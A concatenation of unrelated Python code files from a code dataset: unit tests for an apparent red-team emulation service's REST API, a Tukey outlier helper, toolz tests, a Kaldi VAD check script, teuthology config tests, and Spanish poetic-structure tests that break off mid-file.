{'goals': [{'value': 'complete',\n 'operator': '==',\n 'target': 'exhaustion',\n 'achieved': False,\n 'count': 1048576}],\n 'percentage': 0.0, 'description': '',\n 'id': '495a9828-cab1-44dd-a0ca-66e58177d8cc',\n 'name': 'default'}}\n internal_rest_svc = rest_svc(event_loop)\n operation = event_loop.run_until_complete(internal_rest_svc.create_operation(access=dict(\n access=(internal_rest_svc.Access.RED, internal_rest_svc.Access.APP)),\n data=dict(name='My Test Operation', planner='test', source='123', state='finished')))\n operation_id = operation[0][\"id\"]\n expected_operation['id'] = operation_id\n found_operation = event_loop.run_until_complete(data_svc.locate('operations', match=dict(id=operation_id)))[0].display\n found_operation['host_group'][0].pop('last_seen')\n found_operation.pop('start')\n found_operation[\"host_group\"][0].pop(\"created\")\n assert found_operation == expected_operation\n\n # PART B: Delete the operation (that was created in Part A) from the data service\n delete_criteria = {'id': operation_id, 'finish': None, 'base_timeout': 180, 'link_timeout': 30,\n 'name': 'My Test Operation', 'jitter': '2/8', 'state': 'finished', 'autonomous': True,\n 'last_ran': None, 'obfuscator': 'plain-text', 'auto_close': False, 'visibility': 50,\n 'chain': [], 'potential_links': []}\n event_loop.run_until_complete(internal_rest_svc.delete_operation(delete_criteria))\n assert event_loop.run_until_complete(data_svc.locate('operations', match=dict(id=operation_id))) == []\n\n def test_update_config(self, event_loop, data_svc, rest_svc):\n internal_rest_svc = rest_svc(event_loop)\n # check that 
an ability reflects the value in app. property\n pre_ability = event_loop.run_until_complete(data_svc.locate('abilities', dict(ability_id='123')))\n assert '0.0.0.0' == BaseWorld.get_config('app.contact.http')\n assert 'curl 0.0.0.0' == next(pre_ability[0].executors).test\n\n # update property\n event_loop.run_until_complete(internal_rest_svc.update_config(data=dict(prop='app.contact.http', value='127.0.0.1')))\n\n # verify ability reflects new value\n post_ability = event_loop.run_until_complete(data_svc.locate('abilities', dict(ability_id='123')))\n assert '127.0.0.1' == BaseWorld.get_config('app.contact.http')\n assert 'curl 127.0.0.1' == next(post_ability[0].executors).test\n\n def test_update_config_plugin(self, event_loop, rest_svc):\n internal_rest_svc = rest_svc(event_loop)\n # update plugin property\n assert ['sandcat', 'stockpile'] == BaseWorld.get_config('plugins')\n event_loop.run_until_complete(internal_rest_svc.update_config(data=dict(prop='plugin', value='ssl')))\n assert ['sandcat', 'stockpile', 'ssl'] == BaseWorld.get_config('plugins')\n\n def test_create_operation(self, event_loop, rest_svc, data_svc):\n want = {'name': 'Test',\n 'adversary': {'description': 'an empty adversary profile', 'name': 'ad-hoc', 'adversary_id': 'ad-hoc',\n 'atomic_ordering': [], 'objective': '495a9828-cab1-44dd-a0ca-66e58177d8cc', 'tags': [],\n 'has_repeatable_abilities': False, 'plugin': None},\n 'state': 'finished',\n 'planner': {'name': 'test', 'description': None, 'module': 'test', 'stopping_conditions': [],\n 'params': {},\n 'ignore_enforcement_modules': [], 'id': '123', 'allow_repeatable_abilities': False, 'plugin': ''},\n 'jitter': '2/8',\n 'group': '',\n 'source': '',\n 'host_group': [\n {'trusted': True, 'architecture': 'unknown', 'watchdog': 0, 'contact': 'unknown',\n 'username': 'unknown', 'links': [], 'sleep_max': 8, 'exe_name': 'unknown',\n 'executors': ['pwsh', 'psh'], 'ppid': 0, 'sleep_min': 2, 'server': '://None:None',\n 'platform': 'windows', 'host': 'unknown', 'paw': '123', 'pid': 0,\n 'display_name': 'unknown$unknown', 'group': 'red', 'location': 'unknown', 'privilege': 'User',\n 'proxy_receivers': {}, 'proxy_chain': [], 'origin_link_id': '',\n 'deadman_enabled': False, 'available_contacts': ['unknown'], 'pending_contact': 'unknown',\n 'host_ip_addrs': [], 'upstream_dest': '://None:None'}],\n 'visibility': 50, 'autonomous': 1, 'chain': [], 'auto_close': False, 'objective': '',\n 'obfuscator': 'plain-text', 'use_learning_parsers': False}\n internal_rest_svc = rest_svc(event_loop)\n operation = event_loop.run_until_complete(internal_rest_svc.create_operation(access=dict(\n access=(internal_rest_svc.Access.RED, internal_rest_svc.Access.APP)),\n data=dict(name='Test', planner='test', source='123', state='finished')))\n operation[0].pop('id')\n operation[0]['host_group'][0].pop('last_seen')\n operation[0].pop('start')\n operation[0]['host_group'][0].pop('created')\n assert want == operation[0]\n\n def test_delete_ability(self, event_loop, rest_svc, file_svc):\n internal_rest_svc = rest_svc(event_loop)\n response = event_loop.run_until_complete(internal_rest_svc.delete_ability(data=dict(ability_id='123')))\n assert 'Delete action completed' == response\n\n def test_persist_objective_single_new(self, event_loop, rest_svc, file_svc):\n internal_rest_svc = rest_svc(event_loop)\n req = {\n 'name': 'new objective',\n 'description': 'test new objective',\n 'goals': [\n {\n 'count': 1,\n 'operator': '*',\n 'target': 'host.user.name',\n 'value': 'NA'\n }\n ]\n }\n objs = 
event_loop.run_until_complete(internal_rest_svc.persist_objective({'access': [BaseWorld.Access.RED]}, req))\n # clear out subobject difference\n objs[0]['goals'][0].pop('achieved')\n assert req.items() <= objs[0].items()\n\n def test_persist_objective_single_existing(self, event_loop, rest_svc, file_svc):\n internal_rest_svc = rest_svc(event_loop)\n req = {\n 'name': 'new objective',\n 'description': 'test new objective',\n 'goals': [\n {\n 'count': 1,\n 'operator': '*',\n 'target': 'host.user.name',\n 'value': 'NA'\n }\n ]\n }\n objs = event_loop.run_until_complete(internal_rest_svc.persist_objective({'access': [BaseWorld.Access.RED]}, req))\n # clear out subobject difference\n objs[0]['goals'][0].pop('achieved')\n assert req.items() <= objs[0].items()\n # modify\n modified_req = {'id': objs[0]['id'], 'description': 'modified objective'}\n modified_objs = event_loop.run_until_complete(internal_rest_svc.persist_objective({'access': [BaseWorld.Access.RED]}, modified_req))\n assert modified_req.items() <= modified_objs[0].items()\n\n def test_delete_adversary(self, event_loop, rest_svc, file_svc):\n internal_rest_svc = rest_svc(event_loop)\n data = \"\"\"\n---\n- id: 123\n name: test\n description: test\n atomic_ordering:\n \"\"\"\n with open('data/adversaries/123.yml', 'w') as f:\n f.write(data)\n response = event_loop.run_until_complete(internal_rest_svc.delete_adversary(data=dict(adversary_id='123')))\n assert 'Delete action completed' == response\n\n def test_delete_agent(self, event_loop, rest_svc, file_svc):\n internal_rest_svc = rest_svc(event_loop)\n response = event_loop.run_until_complete(internal_rest_svc.delete_agent(data=dict(paw='123')))\n assert 'Delete action completed' == response\n\n def test_get_potential_links(self, event_loop, rest_svc, planning_svc, data_svc):\n internal_rest_svc = rest_svc(event_loop)\n internal_rest_svc.add_service('planning_svc', planning_svc)\n internal_rest_svc.add_service('data_svc', data_svc)\n links = event_loop.run_until_complete(internal_rest_svc.get_potential_links('123', '123'))\n assert 1 == len(links['links'])\n\n def test_apply_potential_link(self, event_loop, rest_svc, planning_svc, data_svc, app_svc):\n internal_rest_svc = rest_svc(event_loop)\n internal_rest_svc.add_service('planning_svc', planning_svc)\n internal_rest_svc.add_service('data_svc', data_svc)\n internal_rest_svc.add_service('app_svc', app_svc)\n event_loop.run_until_complete(internal_rest_svc.get_potential_links('123', '123'))\n operation = event_loop.run_until_complete(data_svc.locate('operations', match=dict(id='123'))).pop()\n link = operation.potential_links[0]\n event_loop.run_until_complete(internal_rest_svc.apply_potential_link(link))\n assert 1 == len(operation.chain)\n\n def test_set_single_bootstrap_ability(self, event_loop, rest_svc):\n update_data = {\n 'sleep_min': 5,\n 'sleep_max': 5,\n 'watchdog': 0,\n 'untrusted': 90,\n 'implant_name': 'splunkd',\n 'bootstrap_abilities': '123',\n 'deadman_abilities': ''\n }\n want = ['123']\n internal_rest_svc = rest_svc(event_loop)\n agent_config = event_loop.run_until_complete(internal_rest_svc.update_agent_data(update_data))\n assert agent_config.get('bootstrap_abilities') == want\n\n def test_set_multiple_bootstrap_ability(self, event_loop, rest_svc):\n update_data = {\n 'sleep_min': 5,\n 'sleep_max': 5,\n 'watchdog': 0,\n 'untrusted': 90,\n 'implant_name': 'splunkd',\n 'bootstrap_abilities': '123, 456, 789',\n 'deadman_abilities': ''\n }\n want = ['123', '456', '789']\n internal_rest_svc = rest_svc(event_loop)\n 
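# update_agent_data is expected to split the comma-separated ability IDs into a list\n 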
agent_config = event_loop.run_until_complete(internal_rest_svc.update_agent_data(update_data))\n assert agent_config.get('bootstrap_abilities') == want\n\n def test_clear_bootstrap_deadman_ability(self, event_loop, rest_svc):\n update_data = {\n 'sleep_min': 5,\n 'sleep_max': 5,\n 'watchdog': 0,\n 'untrusted': 90,\n 'implant_name': 'splunkd',\n 'bootstrap_abilities': '',\n 'deadman_abilities': '',\n }\n want = []\n internal_rest_svc = rest_svc(event_loop)\n agent_config = event_loop.run_until_complete(internal_rest_svc.update_agent_data(update_data))\n assert agent_config.get('bootstrap_abilities') == want\n assert agent_config.get('deadman_abilities') == want\n\n def test_set_single_deadman_ability(self, event_loop, rest_svc):\n update_data = {\n 'sleep_min': 5,\n 'sleep_max': 5,\n 'watchdog': 0,\n 'untrusted': 90,\n 'implant_name': 'splunkd',\n 'bootstrap_abilities': '',\n 'deadman_abilities': '123'\n }\n want = ['123']\n internal_rest_svc = rest_svc(event_loop)\n agent_config = event_loop.run_until_complete(internal_rest_svc.update_agent_data(update_data))\n assert agent_config.get('deadman_abilities') == want\n\n def test_set_multiple_deadman_ability(self, event_loop, rest_svc):\n update_data = {\n 'sleep_min': 5,\n 'sleep_max': 5,\n 'watchdog': 0,\n 'untrusted': 90,\n 'implant_name': 'splunkd',\n 'bootstrap_abilities': '',\n 'deadman_abilities': '123, 456, 789'\n }\n want = ['123', '456', '789']\n internal_rest_svc = rest_svc(event_loop)\n agent_config = event_loop.run_until_complete(internal_rest_svc.update_agent_data(update_data))\n assert agent_config.get('deadman_abilities') == want\n","sub_path":"tests/services/test_rest_svc.py","file_name":"test_rest_svc.py","file_ext":"py","file_size_in_byte":17549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"426420551","text":"import numpy as np\n\ndef tukey_test(values):\n q1 = np.quantile(values,0.25)\n q3 = np.quantile(values,0.75)\n iqr = q3-q1\n inner_fence = 1.5*iqr\n outer_fence = 3*iqr\n\n #inner fence lower and upper end\n inner_fence_le = q1-inner_fence\n inner_fence_ue = q3+inner_fence\n\n #outer fence lower and upper end\n outer_fence_le = q1-outer_fence\n outer_fence_ue = q3+outer_fence\n\n outliers_prob = np.sort(np.concatenate([np.where(values<=outer_fence_le)[0],np.where(values>=outer_fence_ue)[0]]))\n outliers_poss = np.sort(np.concatenate([np.where(values<=inner_fence_le)[0],np.where(values>=inner_fence_ue)[0]]))\n\n return outliers_prob,outliers_poss\n","sub_path":"phenixml/utils/eval_utils.py","file_name":"eval_utils.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"182776512","text":"from toolz import curry, unique, first\nfrom toolz.sandbox.core import EqualityHashKey\n\n\ndef test_EqualityHashKey_default_key():\n EqualityHashDefault = curry(EqualityHashKey, None)\n L1 = [1]\n L2 = [2]\n data1 = [L1, L1, L2, [], [], [1], [2], {}, ()]\n set1 = set(map(EqualityHashDefault, data1))\n set2 = set(map(EqualityHashDefault, [[], [1], [2], {}, ()]))\n assert set1 == set2\n assert len(set1) == 5\n\n # Test that ``EqualityHashDefault(item)`` is distinct from ``item``\n T0 = ()\n T1 = (1,)\n data2 = list(map(EqualityHashDefault, [T0, T0, T1, T1, (), (1,)]))\n data2.extend([T0, T1, (), (1,)])\n set3 = set(data2)\n assert set3 == set([(), (1,), EqualityHashDefault(()),\n EqualityHashDefault((1,))])\n assert len(set3) == 4\n assert EqualityHashDefault(()) in set3\n assert 
EqualityHashDefault((1,)) in set3\n\n # Miscellaneous\n E1 = EqualityHashDefault(L1)\n E2 = EqualityHashDefault(L2)\n assert str(E1) == '=[1]='\n assert repr(E1) == '=[1]='\n assert E1 != E2\n assert not (E1 == E2)\n assert E1 == EqualityHashDefault(L1)\n assert not (E1 != EqualityHashDefault(L1))\n assert E1 != L1\n assert not (E1 == L1)\n\n\ndef test_EqualityHashKey_callable_key():\n # Common simple hash key functions.\n EqualityHashLen = curry(EqualityHashKey, len)\n EqualityHashType = curry(EqualityHashKey, type)\n EqualityHashId = curry(EqualityHashKey, id)\n EqualityHashFirst = curry(EqualityHashKey, first)\n data1 = [[], [1], (), (1,), {}, {1: 2}]\n data2 = [[1, 2], (1, 2), (1, 3), [1, 3], [2, 1], {1: 2}]\n assert list(unique(data1*3, key=EqualityHashLen)) == data1\n assert list(unique(data2*3, key=EqualityHashLen)) == data2\n assert list(unique(data1*3, key=EqualityHashType)) == data1\n assert list(unique(data2*3, key=EqualityHashType)) == data2\n assert list(unique(data1*3, key=EqualityHashId)) == data1\n assert list(unique(data2*3, key=EqualityHashId)) == data2\n assert list(unique(data2*3, key=EqualityHashFirst)) == data2\n\n\ndef test_EqualityHashKey_index_key():\n d1 = {'firstname': 'Alice', 'age': 21, 'data': {}}\n d2 = {'firstname': 'Alice', 'age': 34, 'data': {}}\n d3a = {'firstname': 'Bob', 'age': 56, 'data': {}}\n d3b = {'firstname': 'Bob', 'age': 56, 'data': {}}\n EqualityHashFirstname = curry(EqualityHashKey, 'firstname')\n assert list(unique(3*[d1, d2, d3a, d3b],\n key=EqualityHashFirstname)) == [d1, d2, d3a]\n EqualityHashFirstnameAge = curry(EqualityHashKey, ['firstname', 'age'])\n assert list(unique(3*[d1, d2, d3a, d3b],\n key=EqualityHashFirstnameAge)) == [d1, d2, d3a]\n list1 = [0] * 10\n list2 = [0] * 100\n list3a = [1] * 10\n list3b = [1] * 10\n EqualityHash0 = curry(EqualityHashKey, 0)\n assert list(unique(3*[list1, list2, list3a, list3b],\n key=EqualityHash0)) == [list1, list2, list3a]\n","sub_path":"toolz/sandbox/tests/test_core.py","file_name":"test_core.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"248729294","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nfrom glob import iglob, glob\nfrom os.path import basename, dirname, join as p_join\nimport json\n\nimport numpy as np\nfrom kaldiio import ReadHelper, WriteHelper\n\n\n\nvad_scp = 'mfcc/vad_train.1.scp'\nmfcc_scp = 'mfcc/raw_mfcc_train.1.scp'\n\nutt_ids = []\nvads = []\nutt_id2vad = {}\nutt_id2mfcc = {}\n\n#low_resol_vad = np.load('/media/sangjik/hdd2/dataset/speech/English/VoxCeleb2/npy_vad/vad_npy/train.17/id04462-35ZDCA1bA0U-00001.npy')\n#low_resol_vad = np.load('/media/sangjik/hdd2/dataset/speech/English/VoxCeleb2/npy_vad/vad_npy/train.1/id00026-KPiwotirhuQ-00017.npy')\n#print(low_resol_vad)\n#print(np.where(low_resol_vad == 0))\n#print(len(np.where(low_resol_vad == 0)[0]))\n\nwith ReadHelper('scp:' + vad_scp) as vad_reader:\n for i, (utt_id, vad) in enumerate(vad_reader):\n #if i < 1:\n if i < 1e7:\n #if utt_id == 'id00026-KPiwotirhuQ-00017':\n utt_id2vad[utt_id] = vad\n #print(utt_id, vad.shape)\n #print(type(utt_id), utt_id=='id00026-KPiwotirhuQ-00017', '{}:{}'.format(utt_id, np.where(vad ==0)))\n #print(utt_id, vad.shape)\n else:\n break\n\nwith ReadHelper('scp:' + mfcc_scp) as mfcc_reader:\n for utt_id, mfcc in mfcc_reader:\n #if i < 1:\n if utt_id == 'id00026-KPiwotirhuQ-00017':\n utt_id2mfcc[utt_id] = mfcc\n 
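# only this one utterance's MFCC matrix is needed for the check, so stop reading here\n 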
break\n\nutt_id='id00026-KPiwotirhuQ-00017'\n\nprint(utt_id2vad[utt_id].shape)\nwith WriteHelper('ark,scp:{},{}'.format('./tmp/vad.ark', './tmp/vad.scp')) as writer:\n writer[utt_id] = utt_id2vad[utt_id]\n\nprint(utt_id2mfcc[utt_id].shape)\nwith WriteHelper('ark,scp:{},{}'.format('./tmp/mfcc.ark', './tmp/mfcc.scp')) as writer:\n writer[utt_id] = utt_id2mfcc[utt_id]\n\n\n#print('vad reading completed')\n#with ReadHelper('scp:' + mfcc_scp) as mfcc_reader:\n# for i, (utt_id, mfcc) in enumerate(mfcc_reader):\n# if utt_id in utt_id2vad.keys():\n# vad = utt_id2vad[utt_id]\n# assert(len(vad) == len(mfcc))\n# print(i, 'check', vad.shape, mfcc.shape)\n","sub_path":"egs/voxceleb/v2/2.3.check_vad.py","file_name":"2.3.check_vad.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"173182752","text":"from .. import config\n\n\nclass TestConfig(object):\n def test_get_ceph_git_base_default(self):\n conf_obj = config.Config()\n conf_obj.teuthology_yaml = ''\n conf_obj.load_files()\n assert conf_obj.ceph_git_base_url == \"https://github.com/ceph/\"\n\n def test_set_ceph_git_base_via_private(self):\n conf_obj = config.Config()\n conf_obj._Config__conf['ceph_git_base_url'] = \"git://ceph.com/\"\n assert conf_obj.ceph_git_base_url == \"git://ceph.com/\"\n\n def test_set_nonstandard(self):\n conf_obj = config.Config()\n conf_obj.something = 'something else'\n assert conf_obj.something == 'something else'\n","sub_path":"teuthology/test/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"342932485","text":"from rantanplan.core import get_scansion\nfrom rantanplan.structures import get_rhyme_pattern_counts\nfrom rantanplan.structures import has_fixed_length_verses\nfrom rantanplan.structures import has_maximum_length\nfrom rantanplan.structures import has_minimum_length\nfrom rantanplan.structures import has_mixed_length_verses\nfrom rantanplan.structures import has_same_length_verses\n\n\ndef test_seguidilla():\n poem = \"\"\"Que se caiga la torre\n de Valladolid\n como a mí no me coja,\n ¿qué se me da a mí?\"\"\"\n output = \"seguidilla\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_seguidilla_compuesta():\n poem = \"\"\"La cebolla es escarcha\n cerrada y pobre:\n escarcha de tus días\n y de mis noches.\n Hambre y cebolla,\n hielo negro y escarcha\n grande y redonda.\"\"\"\n output = \"seguidilla_compuesta\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_chamberga():\n poem = \"\"\"Hoy ensalzo a Cristóbal,\n pero es tan alto\n que mi pluma no puede\n más levantarlo,\n que el hombre\n es de prendas mayores,\n le vemos\n para todo dispuesto,\n por grande\n no hay favor que no alcance.\"\"\"\n output = \"chamberga\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_seguidilla_gitana():\n poem = \"\"\"Yo voy como un ciego\n por esos caminos.\n Siempre pensando en la penita negra\n que llevo conmigo.\"\"\"\n output = \"seguidilla_gitana\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_cuareto_lira_a():\n poem = \"\"\"¡Cuán solitaria la nación que un día\n poblara inmensa gente,\n la nación cuyo imperio se 
extendía\n del Ocaso al Oriente!\"\"\"\n output = \"cuarteto_lira\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_cuareto_lira_b():\n poem = \"\"\"Fatigada del baile,\n encendido el color, breve el aliento,\n apoyada en mi brazo\n del salón se detuvo en un extremo.\"\"\"\n output = \"cuarteto_lira\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_estrofa_safica():\n poem = \"\"\"Dulce vecino de la verde selva,\n huésped eterno del abril florido,\n vital aliento de la madre Venus,\n Céfiro blando.\"\"\"\n output = \"estrofa_sáfica\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_estrofa_safica_1():\n poem = \"\"\"Bosque de piedras que arrancó la historia\n a las entrañas de la tierra madre,\n remanso de quietud, yo te bendigo,\n mi Salamanca.\"\"\"\n output = \"estrofa_sáfica\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_estrofa_safica_2():\n poem = \"\"\"Dulce vecino de la verde selva,\n huésped eterno del abril florido,\n vital aliento de la madre Venus,\n Céfiro blando.\"\"\"\n output = \"estrofa_sáfica\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_estrofa_francisco_de_la_torre():\n poem = \"\"\"Clamó la gente mísera y el cielo\n escondió los clamores y gemidos\n entre los rayos y espantosos truenos\n de tu turbada cara.\"\"\"\n output = \"estrofa_francisco_de_la_torre\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_endecha_real():\n poem = \"\"\"En un jardín de flores\n había una gran fuente,\n cuyo pilón servía\n de estanque a carpas, tencas y otros peces.\n Únicamente al riego\n el jardinero atiende,\n de modo que entretanto\n los peces, agua en que vivir no tienen.\"\"\"\n output = \"endecha_real\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_estrofa_manriquena():\n poem = \"\"\"Delio a las rejas de Elisa\n le canta en noche serena\n sus amores.\n Raya la luna, y la brisa\n al pasar plácida suena\n por las flores.\"\"\"\n output = \"estrofa_manriqueña\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_sexteto_lira_a():\n poem = \"\"\"Suelta al céfiro blando\n ese vellón que luce en tu cabeza,\n verás que, tremolando,\n a cautivar amantes, Lida, empieza,\n y que en cada cabello\n enreda un alma y aprisiona un cuello.\"\"\"\n output = \"sexteto_lira\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_sexteto_lira_b():\n poem = \"\"\"Era Fray Juan un viejo capuchino,\n sostén del peregrino,\n brazo del infeliz, pan del hambriento;\n era Fray Juan, el venerable anciano\n el del cerquillo cano,\n la presea mejor de su convento.\"\"\"\n output = \"sexteto_lira\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_septeto_lira():\n poem = \"\"\"El ánimo constante\n armado de verdad, mil aceradas,\n mil puntas de diamante\n embota y enflaquece; y desplegadas\n las fuerzas encerradas,\n sobre el opuesto bando\n con poderoso pie se ensalza hollando.\"\"\"\n output = \"septeto_lira\"\n input_poem = 
get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_ovillejo():\n poem = \"\"\"¿Quién menoscaba mis bienes?\n Desdenes.\n Y ¿quién aumenta mis duelos?\n Los celos.\n Y ¿quien prueba mi paciencia?\n Ausencia.\n De ese modo, en mi dolencia\n ningún remedio se alcanza,\n pues me matan la esperanza\n desdenes, celos y ausencia.\"\"\"\n output = \"ovillejo\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_quinteto():\n poem = \"\"\"Juegan y beben: mas en bien, sin vicio,\n sin interés y sin exceso: tienen\n del cuarto de Fermín mal en el quicio\n encajada la puerta y se mantienen\n ojo avizor a él por el resquicio.\"\"\"\n output = \"quinteto\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_sexteto():\n poem = \"\"\"Entre las rocas de la costa alzada\n se oye un extraño hablar, de madrugada,\n de gentes que en la noche vigilaron;\n las barcas, animadas de un deseo,\n tienen un misterioso balanceo,\n y nunca se están quietas en donde las dejaron.\"\"\"\n output = \"sexteto\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_sextilla():\n poem = \"\"\"Existe una poesía\n sin ritmo ni armonía\n monótona, cansada,\n como una letanía...,\n de que está desterrada\n la pena y la alegría.\"\"\"\n output = \"sextilla\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_septeto():\n poem = \"\"\"Vengo a mirarte, campo doloroso,\n cuando son triste leña tus encinas,\n cuando en rigores de tu polvo inclinas\n sus mutilados miembros al reposo\n y en las huellas del ciervo sin camino\n se alberga el yerto ruiseñor piadoso\n segado, en pluma tierna, de su trino.\"\"\"\n output = \"septeto\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_septilla():\n poem = \"\"\"Luz de sueño, flor de mito,\n tu admirable cuerpo canta\n la gracia de Hermafrodito\n con lo aéreo de Atalanta;\n y de tu beldad ambigua\n la evocada musa antigua\n su himno de carne levanta.\"\"\"\n output = \"septilla\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_copla_arte_menor():\n poem = \"\"\"Un prado de grand llanura\n veía, con tantas flores,\n que sus diversas colores\n ocultavan la verdura,\n odífferas sin messura;\n en torno del qual passava\n un flumen, que lo çercava\n con su muy gentil fondura.\"\"\"\n output = \"copla_arte_menor\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_copla_mixta():\n poem = \"\"\"Como el profeta recuenta\n que las tronpas judiciales\n surgirán a los mortales\n con estraña sobrevienta;\n bien así todos vinieron\n aquellos que Amor siguieron\n de quien se faze grand cuenta.\"\"\"\n output = \"copla_mixta\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_copla_castellana():\n poem = \"\"\"Las riquezas son de amar;\n ca syn ellas grandes cosas\n maníficas nin famosas\n non se pueden acabar;\n por ellas son ensalmados\n los señores,\n príncipes e emperadores,\n e sus fechos memorados.\"\"\"\n output = \"copla_castellana\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == 
output\n\n\ndef test_novena():\n poem = \"\"\"Hubo un hombre vizcaíno,\n por nombre llamado Juan,\n peor comedor de pan\n que bebedor de buen vino.\n Humilde de condición\n y de bajos pensamientos,\n de corta dispusición\n y de flaca complisión,\n pero de grandes alientos.\"\"\"\n output = \"novena\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_decima_antigua():\n poem = \"\"\"Fylósofo palanciano,\n varón de alta prudencia,\n a quien dio rrica influencia\n el grand planeta diafano;\n yo veo que syempre afano\n por fablar con sabidores,\n lyndos metrificadores;\n a vos, luz de trobadores,\n fablo en modo linpio sano,\n como hermano con hermano.\"\"\"\n output = \"décima_antigua\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_terceto_encadenado():\n poem = \"\"\"Gemidos oigo y lamentar doliente,\n y el ronco son de parches destemplados\n y el crujir de las armas juntamente.\n Marchan en pos del féretro soldados\n con tardo paso y armas funerales\n al eco de los bronces disparados.\n Y entre fúnebres pompas y marciales,\n en la morada de la muerte augusta,\n las bóvedas retumban sepulcrales.\n ¡Ay! Para siempre ya la losa adusta,\n ¡oh caro Albino! le escondió a tus ojos,\n mas no el bueno murió: la parca injusta\n roba tan solo efímeros despojos,\n y alba y triunfante la alcanzada gloria\n guarda en eternos mármoles la historia.\n \"\"\"\n output = \"terceto_encadenado\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_count_characters():\n pattern = \"ababcbcdcdedeff\"\n output = [0, 0, 1, 1, 0, 2, 1, 0, 2, 1, 0, 2, 1, 0, 1]\n assert get_rhyme_pattern_counts(pattern) == output\n\n\ndef test_has_mixed_length_verses_all():\n ranges_list = [range(11, 13), range(7, 12), range(11, 12)]\n length_a = 11\n length_b = 7\n assert has_mixed_length_verses(length_a, length_b, ranges_list)\n\n\ndef test_has_mixed_length_verses_only_one():\n ranges_list = [range(11, 13), range(8, 12), range(11, 12)]\n length_a = 11\n length_b = 7\n assert not has_mixed_length_verses(length_a, length_b, ranges_list)\n\n\ndef test_has_mixed_length_verses_none():\n ranges_list = [range(11, 13), range(7, 12), range(11, 12)]\n length_a = 6\n length_b = 4\n assert not has_mixed_length_verses(length_a, length_b, ranges_list)\n\n\ndef test_has_same_length_verses_true():\n fixed_length = 8\n ranges_list = [range(7, 13), range(8, 12), range(1, 12)]\n assert has_same_length_verses(fixed_length, ranges_list)\n\n\ndef test_has_same_length_verses_false():\n fixed_length = 14\n ranges_list = [range(7, 13), range(8, 12), range(1, 12)]\n assert not has_same_length_verses(fixed_length, ranges_list)\n\n\ndef test_has_fixed_length_verses():\n lengths_list = \"haiku\" # [5, 7, 5]\n ranges_list = [range(5, 13), range(7, 12), range(5, 12)]\n assert has_fixed_length_verses(lengths_list, ranges_list)\n\n\ndef test_has_fixed_length_verses_false():\n lengths_list = \"haiku\" # [5, 7, 5]\n ranges_list = [range(8, 13), range(8, 12), range(1, 12)]\n assert not has_fixed_length_verses(lengths_list, ranges_list)\n\n\ndef test_has_fixed_length_verses_fluctuation():\n lengths_list = \"haiku\" # [5, 7, 5]\n ranges_list = [range(6, 13), range(8, 12), range(6, 12)]\n assert has_fixed_length_verses(\n lengths_list, ranges_list, fluctuation_size=1)\n\n\ndef test_has_minimum_length():\n min_length = 14\n ranges_list = [range(8, 15), range(8, 15), 
